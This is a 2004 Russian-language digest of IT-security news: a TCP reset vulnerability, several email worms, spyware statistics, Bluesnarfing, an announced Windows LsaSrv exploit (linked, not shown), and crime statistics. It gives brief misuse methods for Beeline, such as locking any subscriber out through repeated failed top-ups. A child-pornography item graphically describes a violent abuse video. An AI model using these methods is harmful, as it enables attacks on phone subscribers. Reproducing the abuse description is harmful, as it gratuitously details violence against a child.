Во вторник, 20 апреля 2004, NISCC (National Infrastructure Security Co-ordination Centre) распространил информацию об обнаружении уязвимости в протоколе TCP - одном из основных протоколов передачи данных в интернет. Уязвимости, описанной в сообщении, подвержены реализации TCP протокола отвечающие основной спецификации (RFC 793) и ее расширению "TCP Extensions for High Performance" (RFC 1323). Влияние обнаруженной уязвимисти зависит от производителя оборудования и приложения, и в некоторых случаях может быть критичной. Используя эту уязвимость, атакующий может создать условия для атаки типа "отказ в обслуживании" на установленное TCP соединение, в результате данное соединение будет преждевременно закрыто. Прерывание установленного соединения осуществляется посылкой атакующим TCP пакета с выставленным RST (Reset) флагом и "правильными" TCP адресами и портами источника и приемника. Считалось что такая атака практически не возможна на практике, т.к. в TCP пакетах типа RST или SYN присутствует 32-битный последовательный номер (sequence number) вероятность подобрать который 1/2^32. Однако, Paul A. Watson, исследователь данной уязвимости, утверждает, что в современных реализациях протокола требуется гораздо меньше попыток чтобы подобрать нужное число, что делает эту уязвимость легко реализуемой. Уязвимость, теоретически, может использоваться с целью вывода из строя определенных узлов Всемирной сети путем организации на них DoS-атаки. Кроме того, возможно повреждение данных, отключение маршрутизаторов и т.д. Причем ошибка в ТСР может быть задействована одновременно с дырой в распространенном протоколе маршрутизации BGP (Border Gateway Protocol). В этом случае отрезанными от WWW могут оказаться целые сегменты Сети. Как сообщается, для реализации атаки злоумышленникам нужно отправить на нужный IP-адрес составленные определенным образом TCP-пакеты с установленными флагами RST (Reset) или SYN (Synchronise).
NISCC Vulnerability Advisory 236929

21/04/2004 13:58 Новый хакерский инструмент: шоколадка
Опрос работников лондонских офисов показал, что почти три четверти из них готовы выложить свой пароль доступа к корпоративной сети первому встречному за плитку шоколада. Исследование проводилось организаторами выставки Infosecurity Europe 2004, посвященной безопасности, которая откроется в Лондоне на будущей неделе. Каждому из 172 пассажиров на вокзале Liverpool Street Station они предложили плитку шоколада, если те назовут свой корпоративный пароль. Удивительно, но 37% согласились сразу, а еще 34% — после того, как интервьюер высказал предположение, что их секретный код доступа, скорее всего, совпадает с именем домашнего питомца или ребенка. По словам Клары Селлик, директора выставки Infosecurity Europe 2004, эти результаты доказывают, что работодатели не инструктируют своих пользователей на предмет важности защиты информации: «Это объясняется плохим обучением и слабо организованными процедурами. Работодатели должны убедиться, что их сотрудники знают правила информационной безопасности и соблюдают их», — говорится в ее заявлении. Согласно отчету, большинство участников исследования выразили недовольство тем, что им приходится помнить так много разных паролей, и предпочли бы биометрическую аутентификацию — типа распознавания отпечатков пальцев — или смарткарты. «Ясно, что служащим надоело запоминать множество паролей, и они будут рады заменить их альтернативной технологией идентификации», — говорит Селлик.
Подробности

21/04/2004 13:51 Spyware новая чума века высоких технологий
19 апреля Федеральная торговая комиссия США (Federal Trade Commission WASHINGTON, D.C.) провела симпозиум посвященный проблеме распространения шпионского програмного обеспечения. На симпозиуме присутствовали представители Microsoft и других лидеров IT индустрии. Обсуждались вопросы по развитию и увеличению действий по просвещению пользователей, разработке анти-шпионских (anti-spyware) технологий и более эффектифной законодательной базы по отношению к разработчикам подобного рода ПО. Участники отмечали, что пользователи привыкли обращать свое внимание и достаточно информированы по поводу вирусов, почтовых червей, или спама. Но так называемое "spyware" является настоящей проблемой т.к. подобные программы как правило не видимы для пользователя и способны без его ведома похищать секретную информацию, пинкоды, пароли, номера кредитных карт и мониторить действия пользователя. По сообщению Reuters, компания EarthLink провела свое исследование в ходе которого на 1.1 млн. проверенных компьютерах было обнаружено более чем 300 000 вредоносных программ. Microsoft выпустила пресс-релиз и открыла специальную страничку (www.microsoft.com/spyware/) где рассказывает пользователям как можно обнаружить и чем опасно подобное ПО.
По материалам Reuters и Microsoft

21/04/2004 12:41 Почтовый червь NetSky-X распространяется по Европе
Червь NetSky-X, последний из этой серии почтовых червей, демонстрирует знание иностранных языков, ранее не известную среди вирусописателей. Последняя его модификация, обнаруженная сегодня, отсылает сообщения на английском, шведском, финском, польском, норвежском, португальском, итальянском, францзском или немецком языках. Червь-полиглот интенсивно распространяется в Европе. Это распространение бесспорно поддерживается тем фактом что большинство пользователей видят инфицированное сообщение на своем родном языке, а не на английском, как обычно. Хотя это не говорит о том что его безвестный автор знаток языков. "В большинстве случаев сообщения, отправленные червем составлены неправильно, это говорит о том , что автор не пользовался услугами носителей языка а воспользовался системой автоматического перевода такими, как например Babel Fish", сообщает финская антивирусная компания F-Secure. В остальном NetSky-X очень похож на 23 других своих "собрата". Он распространяется по электронной почте, когда пользователь открывает инфицированный аттачмент, которым обычно является .PIF файл. Тема письма обычно: "Re: document" или какой-нибудь плохой перевод подобной фразы. Червь предпринимает DoS (Denial of Service) атаку на три немецко-язычных сайта www.nibis.de, www.medinfo.ufl.edu и www.educa.ch. Обычно пользователи осведомлены о повышенном риске если они запускают аттачменты из незнакомых писем. Этот червь работает только под Windows-системами. Пользователи Mac и Linux не ему подвержены.
Источник

21/04/2004 10:32 Статистика компьютерных преступлений в России
Рост числа правонарушений в сфере компьютерной информации идет не менее быстрыми темпами, чем компьютеризация в России. Преступников не пугает и тот факт, что по ст. 272 УК РФ - неправомерный доступ к компьютерной информации - им грозит от шести месяцев до пяти лет лишения свободы.
По данным Главного информационного центра МВД России, в прошлом году таких правонарушений было совершено 7053 тысячи, что почти в два раза больше по сравнению с 2002 годом - 3782. Статья 273 - создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами. В 2002 году зарегистрировано 330 преступлений, в 2003 году – 728. Количество зарегистрированных и расследованных преступлений по ст. 274 - нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред – уменьшилось, по сравнению с предыдущим периодом. Пик таких преступлений пришелся на 2001 год – 120. В 2002 году - 10; в 2003 году – 1. Количество зарегистрированных причинений имущественного ущерба путем обмана или злоупотребления доверием, совершенных с использованием компьютерной информации (незаконное использование логинов и паролей доступа в сеть Интернет (ст.ст.165 и 272 УК РФ) также увеличилось почти в два раза: в 2002 году – 1494, в 2003 году – 2321.
Источник

20/04/2004 15:45 Новый интернет-червь защищает права венгров
Антивирусная компания Panda Software предупреждает о появлении очередной вредоносной программы. Червь Zafi.A распространяется по электронной почте в виде файлов-вложений с очень длинным именем с расширением .СОМ. После неосторожного запуска присланного файла пользователем компьютера, червь закрывает процессы, принадлежащие известным ему антивирусным пакетам, и создает две свои копии с расширениями .ЕХЕ и .DLL в директории Windows. Кроме того, вирус записывает собранные ранее адреса электронной почты в пять файлов с произвольными именами и расширениями DLL. Кстати, в процессе рассылки применяется встроенный SMTP-сервер, а в качестве обратного адреса указывается либо аккаунт, установленный в инфицированной системе по умолчанию, либо учетная запись kepeslapok@meglep.hu. Для обеспечения автоматического запуска при каждой загрузке операционной системы червь Zafi.A вносит ряд изменений в реестр. Родиной вируса, по всей видимости, является Венгрия. Об этом говорят несколько обстоятельств. Во-первых, тема письма и содержимое написаны на венгерском языке. А во-вторых, если системная дата установлена на 1 мая 2004 года или более позднюю дату, вредоносная программа выводит на экран компьютера сообщение в поддержку венгерских трудящихся (см. рисунок). Размер червя составляет 11776 байт в сжатом виде и примерно 23 кб в распакованном. В коде Zafi.A также имеются процедуры, благодаря которым после 1 мая 2004 года вирус теряет способность к дальнейшему распространению.
Подробности

20/04/2004 15:27 Ученые замышляют «Linux в сфере маршрутизации»
Разработчики нового программного обеспечения open source для IP-маршрутизаторов надеются сделать для маршрутизации то же, что Linux сделала для операционных систем. Проект под названием Extensible Open Router Platform (XORP) реализуется в Международном институте вычислительной техники (International Computer Science Institute, независимой исследовательской организации, тесно связанной с Калифорнийским университетом Беркли. По словам Ориона Ходсона, одного из трех участников проекта, версия 1.0 выйдет в июне. XORP направлен главным образом на исследовательские цели, но со временем может использоваться и для создания недорогих коммерческих маршрутизаторов для передачи трафика пакетов по корпоративным сетям и интернету. С применением стандартных компонентов ПК маршрутизатор XORP можно построить примерно за $1500. Сопоставимое решение от гиганта маршрутизаторов Cisco Systems может обойтись в 10-20 раз дороже. Программное обеспечение имеет ряд преимуществ. В отличие от старого кода, каждый компонент XORP работает как отдельный процесс. В случае отказа одного компонента он не повлияет на другие, использующие ту же аппаратуру. Для сравнения, программное обеспечение Cisco IOS выполняется как один процесс, и отказ любого компонента нарушает работу всего маршрутизатора.
Подробнее

20/04/2004 15:12 IP-телефонию запретят?!
Опубликован довольно неприятный для операторов IP-телефонии проект постановления правительства. Фактически, данным постановлением IP-телефония ставится вне закона, а интернет-провайдеры столкнутся с серьёзными проблемами. Вот несколько выдержек из законопроекта. "Каждая сеть передачи данных общего пользования должна быть связана как минимум с двумя сетями передачи данных других российских операторов." "Передача голосового трафика между абонентами телефонной сети общего пользования через сеть передачи данных не допускается." "Голосовой трафик от/к абонентов сети передачи данных, находящихся в одном субъекте Российской Федерации, к/от абонентам (ов) телефонной сети, находящимся в другом субъекте Российской Федерации, или за пределами Российской Федерации, должен передаваться через федеральные транзитные узлы Федеральной транзитной сети международной, междугородной связи." "Стабильное существование сети передачи данных общего пользования должно быть не менее 5 лет." "Доступ абонентов телефонной сети к услугам/абонентам сети передачи данных осуществляется присоединением сети передачи данных к местной телефонной сети связи общего пользования на абонентском уровне. Использование данного присоединения для доступа абонентов сети передачи данных к услугам/абонентам телефонной сети не допускается." "Подключение оконечного оборудования к сети передачи данных с использованием нумерации телефонной сети не допускается." Комментарии, как говорится, излишни.
http://electrosviaz.com/doc.htm
Сам документ:
http://electrosviaz.com/Doc/Proekt/Pr_Pravil_Pris.zip

20/04/2004 12:46 Червь Phatbot получил новое распространение
В понедельник SANS Institute (http://www.sans.org/) распространил предупреждение о появлении нового варианта червя Phatbot атакующего MS SQL Server. За последний месяц троянский конь Phatbot вновь получил свое распространение, атакуя Windows системы. Зараженный Phatbot-ом компьютер используется в дальнейшем для рассылки спама или для реализации других атак. Специалистам института SANS пока еще не удалось получить полный пакет содержащий тело вируса (или выполняемый файл) для дальнейшего изучения. Согласно сообщению, этот червь сканирует порты: 2745, 1025, 3127, 6129, 5000, 80 и 1433 используя протокол TCP, а также распространяется по Microsoft's NetBIOS. Phatbot основан на "peer to peer" технологии, что затрудняет его уничтожение, т.к. нет единого "командного центра" в сети из зараженных компьютеров. "Phatbot тарнсформируется и изменяется ежедневно" говорит Marcus Sachs, директор SANS Internet Storm Center. "Мы считаем что это уже другая версия "Phatbot." Между тем, представитель Microsoft сообщил что они не получали никаких новых сообщений о распространении червя Phatbot.
Источник

20/04/2004 01:24 Разрабатывается компьютерная программа для распознования "безвучной речи"
Ученые НАСА приступили к разработке компьютерной программы, способной распознавать беззвучную человеческую речь путем анализа посылаемых мозгом к горлу нервных сигналов, управляющих речью.
Во время предварительных экспериментов эти сигналы считывались при помощи специальных датчиков размеров с пуговицу, прикрепленных под подбородком с обеих сторон адамова яблока, а затем после специальной обработки компьютерная программа "переводила" их в слова. По мнению ученых НАСА, в будущем такие системы распознавания "беззвучной речи" могут быть использованы для оснащения скафандров космонавтов, для осуществления связи в шумных местах, например, для приема команд диспетчеров аэропорта, а также для повышения точности традиционных программ распознавания речи. По словам Чака Йоргенсена (Chuck Jorgensen) из калифорнийского Исследовательского центра НАСА имени Эймса в Силиконовой долине, возглавляющего группу разработчиков, предметом анализа является непроизнесенная вслух, беззвучная речь, когда человек читает про себя, или мысленно говорит сам с собой. Как отметил г-н Йоргенсен, при этом все равно возникают биологические сигналы, вне зависимости от того, шевелятся ли губы человека или его лицевые мышцы. Г-н Йоргенсен также пояснил, что даже когда человек мысленно составляет предложения или проговаривает мысли про себя так тихо, что его не слышно, мозгом на язык и на голосовые связки все равно поступают речевые сигналы. На первом этапе тестирования ученым удалось "обучить" специальную компьютерную программу распознавать беззвучно произносимые шесть слов ("стоп", "идти","налево", "направо", "альфа" и "омега") и 10 цифр (от нуля до 9). Точность начального распознавания составила 92%. Эксперимент заключался в следующем: беззвучно произнося эти слова, ученые проводили несложный поиск по Интернету, при этом для управления программой Web-браузера, использовалась цифровая таблица соответствия алфавиту. Как пояснил г-н Йоргенсен, исследователи построили из букв алфавита матрицу, подобно обычному календарю, пронумеровав ее строки и столбцы числами от 0 до 9. Таким образом, каждая буква - элемент матрицы - обозначается в ней уникальной парой координат. С помощью такой матрицы исследователи беззвучно задали поиск слова "НАСА" на одном из известных поисковых серверов. Затем электронным способом пронумеровали Web-страницы, полученные в результате поиска и снова использовали цифры для выбора Web-страниц для анализа. Таким образом, была продемонстрирована возможность осуществления поиска по интернету без помощи клавиатуры. В настоящее время ученые проводят испытания с новыми "бесконтактными" датчиками, которые способны считывать сигналы даже через слой одежды. Следующим этапом разработки программы должна стать демонстрация возможности управления механическим устройством при помощи простого набора команд. Группа г-на Йоргенсена планирует проведение таких тестов по управлению модели марсохода. "Модель марсохода будет передвигаться налево или направо, следуя нашим "беззвучно" выданным командам, - пояснил г-н Йоргенсен. По мнению ученых, такие системы могут использоваться в будущем для конфиденциального общения, например во время телефонных разговоров в автобусе или метро. По мнению ученых, расширенная система управления мышцами может оказаться полезной для получивших травму космонавтов при работе с оборудованием. Г-н Йоргенсон привел следующий пример: в результате длительного космического полета у космонавтов возникает мышечная слабость, в этих случаях для осуществления посадки на Марс или приземления, экипаж сможет просто выдавать команды на компьютер с соответствующим программным обеспечением. Также логично, что такие системы найдут различное применение для инвалидов. Для лучшего понимания того, как происходит процесс управления голосовыми связками, мышцами и положением языка под воздействием нервных сигналов, ученые центра НАСА имени Эймса изучают комплесные паттерны нервных импульсов. Как объянил г-н Йоргенсон, ученые используют амплификаторы для усиления электрических нервных импульсов. Затем импульсы обрабатываются для удаления шума и выявления составляющих полезного сигнала для формирования различных слов. Затем при помощи компьютерной программы эти усиленные нервные импульсы "считываются" для распознавания отдельных слов и звуков. Ключевыми компонентами системы являются датчики, обработка сигналов и распознавание образов. В этом также заключается суть научного исследования. Ученые под руководством г-на Йоргенсона продолжают расширять "словарный запас" системы" при помощи наборов звуков английского языка для возможности их использования в полноценной компьютерной программе распознавания речи. Исследования в области распознавания беззвучной речи финансируются в рамках Программы изучения связи, информатики и компьютерных технологий Подразделения системных исследований НАСА. Вопрос о выдаче патента на новую технологию в настоящее время рассматривается.
Фотографии.

19/04/2004 16:39 Школа хакеров в Одессе - взлом или защита
Выпускник престижного Одесского государственного университета Василий Кондрашов зарабатывает на жизнь для своей жены и маленького ребенка тем, что учит других «ломать» чужие компьютеры. «Хакерство - это не обязательно преступление, точно также, как нож - не всегда опасен. Все зависит от человека», - говорит Кондрашов, который возглавляет, то, что он называет «Школой гражданских хакеров» в Одессе (уж не ученик ли это "великого и ужасного" Арви? - прим.ньюсмейкера). Он уверен: «Моя задача состоит в том, чтобы давать знания и привить чувство ответственности за применение этих знаний для добра или для зла». Выпускник престижного Одесского государственного университета Кондрашов говорит, что большую часть знаний о защите информации он получил во время своей работы - сетевым администратором в другом украинском университете. Сейчас он работает сетевым администратором в местном представительстве международной благотворительной организации. Это очень выгодное место, но оно не приносит ему достаточно денег, чтобы содержать семью. Его жена, школьный учитель, зарабатывает лишь 250 долларов в год, а его родители получают пенсию 10 долларов в месяц. Все, что Кондрашов смог предложить слабой экономике Украины, это свои хакерские способности. Два года назад компьютерный гений начал преподавать на курсах программирования студентам университета. По его словам, в прошлом году его курсы посещали около 300 студентов, чтобы научиться устранять неполадки в PC и изучить несколько языков программирования, таких как “C” и “PERL”. По мере того, как популярность Кондрашова росла, он начал получать письма от «более продвинутых студентов», которые хотели бы «получать знания ради знаний». Вместе они мирно шагали по киберпространству, открывая и закрывая файлы в локальных сетях различных компаний, но не для того, чтобы украсть или разрушить, настаивает Кондрашов, а лишь для того, чтобы размять свои мозги. «Я ничему вредному своих студентов не учил, я учил их только тому, что может понадобиться для защиты компьютерной системы от вторжений, - говорит Кондрашов. - Мое правило: никогда не уходить, разрушив».
Источник

19/04/2004 15:33 Специализированный семинар для разработчиков ПО «Защити своё»
Компания Rainbow Technologies приглашает Вас 19 мая 2004 года принять участие в бесплатном специализированном семинаре, проводимом совместно с представителями Управления «Р» ГУВД г. Москвы, компании Rainbow-SafeNet (США), Представительства Novell и Исследовательской группы CNews Analytics, посвящённому обсуждению правовых вопросов пиратства, методов борьбы с ним и использования новейших технологий для защиты ПО. Семинар ориентирован на руководителей и специалистов компаний-разработчиков программного обеспечения, заинтересованных в защите интеллектуальной собственности от нелегального распространения. Семинар будет состоять из 2-х частей. Утренняя сессия (начало регистрации — 10:00) ориентирована на руководителей и специалистов компаний-разработчиков программного обеспечения, заинтересованных в защите интеллектуальной собственности от нелегального распространения. На вечернюю сессию (начало регистрации — 15:00) приглашаются разработчики, которые защищают своё ПО, используя электронные ключи Sentinel.
Подробности

19/04/2004 14:32 Apple отказалась от сотрудничества с RealNetworks
Корпорация Apple отказалась от предложения компании RealNetworks сформировать "тактический альянс" против Microsoft. Об этом сообщает Associated Press со ссылкой на заявления представителей RealNetworks. Роб Глэйзер, глава RealNetworks, напомним, в конце прошлой недели изъявил желание объединить усилия с Apple в сфере онлайновой торговли музыкой. В письме, направленном Стиву Джобсу, Глэйзер просил основателя Apple обдумать возможность лицензирования фирмой RealNetworks технологии управления цифровыми правами, использующейся для защиты файлов, распространяемых через интернет-магазин iTunes Music Store. Предполагалось, что получение лицензии на систему защиты Fairplay позволит RealNetworks сделать собственную онлайновую музыкальную службу Rhapsody полностью совместимой с самыми популярными на сегодняшний день портативными МР3-плеерами iPod. Для Apple формирование "тактического альянса" должно было выразиться в увеличении объемов продаж плееров iPod и появлении поддержки этих устройств в программных продуктах RealNetworks. Тем не менее, компания Стива Джобса посчитала, что сотрудничество с RealNetworks ей ни к чему. В итоге Apple ответила Глэйзеру категоричным отказом, даже не пожелав организовать личную встречу. В RealNetworks, естественно, выразили сожаление и снова заметили, что теперь, вероятно, компании придется обратиться с предложением о формировании альянса к софтверному гиганту. В случае, если Microsoft примет условия Глэйзера, ПО RealNetworks получит поддержку конкурирующего формата хранения мультимедийного контента WMA.
Источник

19/04/2004 13:17 Вышел апрельский номер журнала "Системный администратор"
Вышел апрельский номер журнала "Системный администратор". В номере представлены статьи: прозрачное проксирование через Squid; работа со средствами отложенной работы и работы по расписанию в FreeBSD 5.1; синхронизация часов по NTP (Network Time Protoсol); создание двухузлового кластера с разделяемым хранилищем данных используя Windows 2000/2003; тестирование устройства Watchdog; ошибки переполнения буфера извне и изнутри как обобщенный опыт реальных атак.(часть 2); обзор утилит, предназначенных для поиска доказательств взлома, а также применяемых для сохранения случайно или умышленно стертых данных; краткая характеристика алгоритмов симметричного и асимметричного шифрования; оптимизация сортировки в Perl; альтернативы парольной защите; автоматизация веб-проектов через электронную почту.
Подробности

19/04/2004 12:44 WebMoney будет работать через GPRS
Сервис Телепат объявляет о новой версии Java-приложения для управления WM-кошельками с мобильного телефона, сообщает internet.ru. С выходом GPRS-версии GSM-Keeper перечень поддерживаемых моделей сотовых телефонов значительно расширился. Сервис "Телепат" предназначен для проведения расчетов между телефонными абонентами в режиме реального времени. Для хранения и перевода средств в сервисе используются электронные кошельки системы WebMoney Transfer, управление которыми осуществляется пользователями сервиса при помощи мобильных или городских телефонов. Сервис не взимает платы за регистрацию и использование интерфейсов сервиса для управления средствами.
Подробности

19/04/2004 11:49 SGI продает софтверное отделение
В четверг компания Silicon Graphics объявила, что продаст свое отделение Alias, производящее ПО 3D-графики и анимации. В заявлении производителя high-end компьютеров говорится, что инвестиционная фирма Accel-KRR согласилась приобрести Alias за $57,5 млн. Сделку предполагается оформить в этом квартале. SGI производит суперкомпьютеры, мощные серверы и рабочие станции — богато оснащенные ПК для решения таких ресурсоемких задач, как 3D-моделирование и научные расчеты. В последние годы компания переживала трудности в связи с общим спадом в технологической отрасли и переносом на high-end компьютеры методов массового производства вроде тех, что привели к минимизации прибылей в секторе ПК. Продукты Alias Maya входят в число ведущих инструментов создания 3D-графики для кинофильмов, компьютерных игр и других видов развлечений. Рынок такого графического ПО в последние годы переживает бум благодаря росту продаж видеоигр и расширению использования компьютерной графики в кино. Alias будет функционировать как отдельная компания, принадлежащая Accel-KRR, которая обещает сохранить прежний менеджмент.
Источник

19/04/2004 11:31 Уязвимости провайдера сотовой связи "Билайн"
Как сообщает в ЖЖ один из владельцев страницы, им были обнаружены довольно интересные уязвимости (или особенности?) у известного провайдера услуг сотовой связи "Билайн". Было обнаружено, что:
1. Можно бесплатно пользоваться услугой голосовой почты.
2. Можно узнать состояние баланса у любого абонента с номером из сети 903.
3. Используя уязвимость номер 2, можно заблокировать любого абонента "Билайн", поскольку эта особенность может быть использована для пополнения счёта - таким образом, если неудачно вводить код с карточки N раз (50 при пополнении с помощью USSD), то телефон заблокируют.
Подробности

19/04/2004 11:04 Недельный отчёт о вирусах от Panda Software
Опубликован традиционный еженедельный отчёт о вирусной активности прошедшей недели от компании Panda Software. В нём рассмотрены две версии Netsky -V и U-, а также утилита скрытого управления Hideout.A.
Подробности

18/04/2004 20:30 Эксплоит уязвимости Windows
Появился ещё один исходный код уязвимости, недавно обнаруженной в семействе ОС Windows и закрытое заплатой, опубликованной в бюллетене по безопасности MS04-011. На этот раз используется уязвимость в реализации SSL протокола сервиса LsaSrv. Исходный код написан испанцами David Barroso Berrueta и Alfredo Andres Omella из компании S21sec. Написан для *nix-ОС, работа проверялась в ОС Windows 2000 с IIS 5.0. Успешное проведение атаки делает недоступным сервис LsaSrv на удалённом сервере.
Исходный код

18/04/2004 20:02 Задержана распространительница компьютерных "червей”
Сотрудникам отдела по линии БЭП ГУВД Московской области удалось вчера уличить 22-летнюю жительницу Москвы в распространении опасных компьютерных программ. Официально нигде не работающая москвичка была задержана группой спецназа при попытке продать на улице в подмосковном городе Мытищи компьютерный диск с хакерскими программами. Кроме того, диск содержал исходные коды "червей", которые могли “без проблем подбирать пароли ко всем видам зашифрованной информации и появлялась возможность без ведома пользователя копировать, уничтожать, модифицировать данные, содержащиеся в компьютере и блокировать доступ к ним” (© БЭП ГУВД) (о как! - замечание ньюсмейкера, - особенно нравится в этой фразе слово "ко ВСЕМ"). Как сообщил источник в МВД, вредоносность программ подтверждена исследованием "Юридического агентства защиты поставщиков программных продуктов". Вчера Главным следственным управлением при ГУВД Московской области по данному факту было возбуждено уголовное дело по части 1 статьи 273 (создание, использование и распространение вредоносных программ для ЭВМ). Злоумышленнице грозит лишение свободы до трех лет.
Источник

18/04/2004 19:37 Спаммеров приравняли к ворам и вандалам
В соответствии с выпущенным во вторник циркуляром Пенитенциарной комиссии США, условия содержания в тюрьмах спаммеров должны быть такими же жесткими, как и для лиц, признанных виновными в воровстве, мошенничестве и уничтожении собственности. Как пишет ZDNet UK, рекомендация Пенитенциарной комиссии США (United States Sentencing Commission – USSC) выпущена с целью уточнения некоторых вопросов, оставшихся после принятия небезызвестного Can-SPAM Act – закона, предусматривающего уголовную ответственность за рассылку спама. Несмотря на то, что в законе были вполне четко прописаны сроки, на которые можно было угодить за решетку, оставался вопрос режима содержания: в «санатории» с облегченным режимом с регулярными «увольнительными» домой или же в тюрьме особо строгого режима с одиночными каменными мешками, пулеметчиками на крышах и ежедневными обысками.
Источник

18/04/2004 19:13 Digital Design получил лицензии ФСБ
Компания Digital Design получила лицензии ФСБ России (ФАПСИ) на использование шифровальных средств. Лицензии ФСБ подтверждают квалификацию персонала Digital Design и наличие в компании соответствующих условий для проведения работы с использованием шифровальных средств. Теперь компания имеет право на распространение и техническое обслуживание шифровальных средств для защиты информации, не составляющей государственную тайну, а также на разработку и производство защищенных с использованием шифровальных (криптографических) средств информационных систем. Digital Design получила лицензии ФСБ для работы с государственными предприятиями, которые требуют наличия подобного рода лицензии для допуска к работам. Руководство компании ожидает, что получение лицензии позволит повысить эффективность работы с такими крупным государственными предприятиями как Минэкономразвития РФ и ОАО «РЖД» (МПС). Кроме того, наличие лицензий является сильным конкурентным преимуществам для участия в государственных тендерах.
Источник

18/04/2004 18:43 Появилась новая версия известного вируса
Пользователи домашних компьютеров подверглись атаке новой версии вируса-"червя", известного как Netsky. Первая версия "червя", Netsky-A, появилась в январе этого года и использует брешь в системе безопасности программного обеспечения от Microsoft. Если предыдущие версии вируса активировались, когда пользователь открывал вложенный файл в электронном письме, то последняя версия, Netsky-V, инфицирует компьютер даже если пользователь просто просматривает пришедшую корреспонденцию. "Червь", который еще не получил такого широкого распространения, как его предшественники, использует для проникновения Microsoft Outlook и Internet Explorer, для которых не были установлены соответствующие патчи. Известная антивирусная компания Sophos заявила, что Netsky-V впервые был обнаружен 15 апреля. "Пользователи домашних компьютеров особенно уязвимы для такого рода атак, потому что зачастую не заботятся должным образом о собственной безопасности, не используют файерволлы и не обновляют вовремя антивирусные программы", заявил представитель компании. Пользователям необходимо скачать с сайта Microsoft специальные обновления, закрывающие бреши в системе безопасности, которые использует вирус. Копии Netsky-V worm были обнаружены в следующих сообщениях почтовых серверов: "mail delivery sytem (sic) failure, mail delivery failed", "server system failure", "gateway system failure". Первая строка инфицированного письма может содержать сообщение "converting message, please wait" или "please wait while loading failed message" (впрочем, если Вы пользуетесь Outlook, то это не имееет после прочтения большого значения ;)).
Подробнее

18/04/2004 04:54 Настораживающая статистика
Интернет-провайдер EarthLink и компания Webroot Software опубликовали совместный отчет (за первые три месяца этого года), в котором говорится, что на каждом компьютере в среднем установлено до 28 шпионских (spyware) программ. Они были обнаружены более чем на 30% просканированных компьютерах. Большая часть из обнаруженных 29 миллионов экземпляров программ представляет собой относительно безобидные рекламные крутилки либо мониторы веб-серфинга, однако около 300 тысяч из найденных программ - специально разработанные программы для похищения информации, в частности, кейлоггеры, а также средства удаленного управления (трояны). Хотелось бы надеяться, что у граждан xUSSR с программами подобного рода проблем нет, но оснований для этого мало - spyware чрезвычайно распространены и поставляются, как правило в комплекте с разного рода условно-бесплатными (shareware) программами. И если трояны ловятся антивирусами, то со spyware дело обстоит не так - для отлова приходится устанавливать специальный софт, например Lavasoft Adware. Хочется отметить способ, которым EarthLink проводил сканирование - этот провайдер предлагал своим клиентам программу Spyware Blocker как часть пакета услуг, в который входит множество полезных и не очень:-) программ, доступных для скачивания с его сайта.
Источник: йцукенг, на основании материалов securityfocus.com и www.computerweekly.com

17/04/2004 16:36 Мобильные телефоны могут подвергнуться атаке хакеров
Информация, хранящаяся в памяти мобильных телефонов, может быть перехвачена хакерами, которые находятся на расстоянии нескольких десятков метров от объекта. Об этом предупреждает своих читателей британская The Daily Mirror. Автором этого тревожного открытия, отмечает газета, является глава лондонской компании в сфере безопасности A.L.Digital Адам Лори, который выяснил, что любой мобильный телефонный аппарат, использующий технологию Bluetooth, может подвергнуться атаке хакеров. Для перехвата информации взломщики используют технику, получившую название Bluesnarfing. С ее помощью злоумышленник получает доступ к телефонным номерам, данным записной книжки и другим конфиденциальным данным, содержащимся в телефонном аппарате абонента. Хакер может незаметно для владельца считывать и менять содержимое памяти телефона (адресную книгу, план-календарь и другую информацию), не оставляя никаких следов вторжения. Причем хакеры могут даже отправлять через атакованный аппарат SMS-сообщения.
Подробности

17/04/2004 16:26 Sony предлагает бумажный диск
Компании Sony и Toppan Printing сказали новое слово в технологии дисков Blu-ray. Почти год две компании трудились над способом нанесения данных на диски Blu-ray, изготавливаемые главным образом из бумаги. Компании намерены выпускать дешевые диски и расширять область применения своей технологии. В четверг Sony и Toppan анонсировали 25-Гбайт диски и обещают изложить подробности на конференции Optical Data Storage, которая состоится в этот уикенд в Монтерее (штат Калифорния). На такой диск можно записать более двух часов видеоизображения высокой четкости. Формат Blu-ray Disc использует синий лазер и считается преемником современных DVD с красным лазером. Емкость дисков Blu-ray более чем в пять раз превышает емкость современных DVD. Дисководы для этих дисков только начинают появляться на рынке. В Японии Sony выпустила дисковод Blu-ray в прошлом году.
Подробности

17/04/2004 12:05 Детская порнография в Интернете - проблемы остаются
В сети Интернет распространяется до 75% всей детской порнопродукции. По данным правоохранительных органов, около 90% международных розыскных поручений Интерпола по компьютерной преступности посвящены именно этой проблеме. Мировая порнографическая индустрия, зная о провальном положении с правовой оценкой этого вида преступлений в России, стремится переместить свои ресурсы детской порнографии на территорию российской части Интернета. В качестве примера можно привести случай с появлением в Интернет 40-секундного видео-ролика, на котором двое извращенцев вступают в половой контакт с малолетней девочкой, в ходе которого наносят ей колото-резаные раны, отрезают уши и выбивают глаза. По данным Управления “Р”, первыми на этот клип обратили внимание сотрудники ФБР США, эксперты которого установили, что в клипе - не имитация, а реальные действия. Было также установлено, доступ к ролику американцы получали за 400 долларов США со специализированного российского сайта. После чего к расследованию были подключены и сотрудники Управления “Р”. Спустя 3 месяца изготовители этого ролика были обнаружены в одной из стран Юго-Восточной Азии, где впоследствии они были приговорены к смерти и казнены. Потребители данной продукции в различных странах мира были осуждены на срок от 10 до 120 лет лишения свободы. В то же время, соучастника этой группы на территории России, из-за несовершенства законодательства, к уголовной ответственности привлечь не удалось.
Источник

16/04/2004 12:04 Легендарный российский антивирус меняет владельца
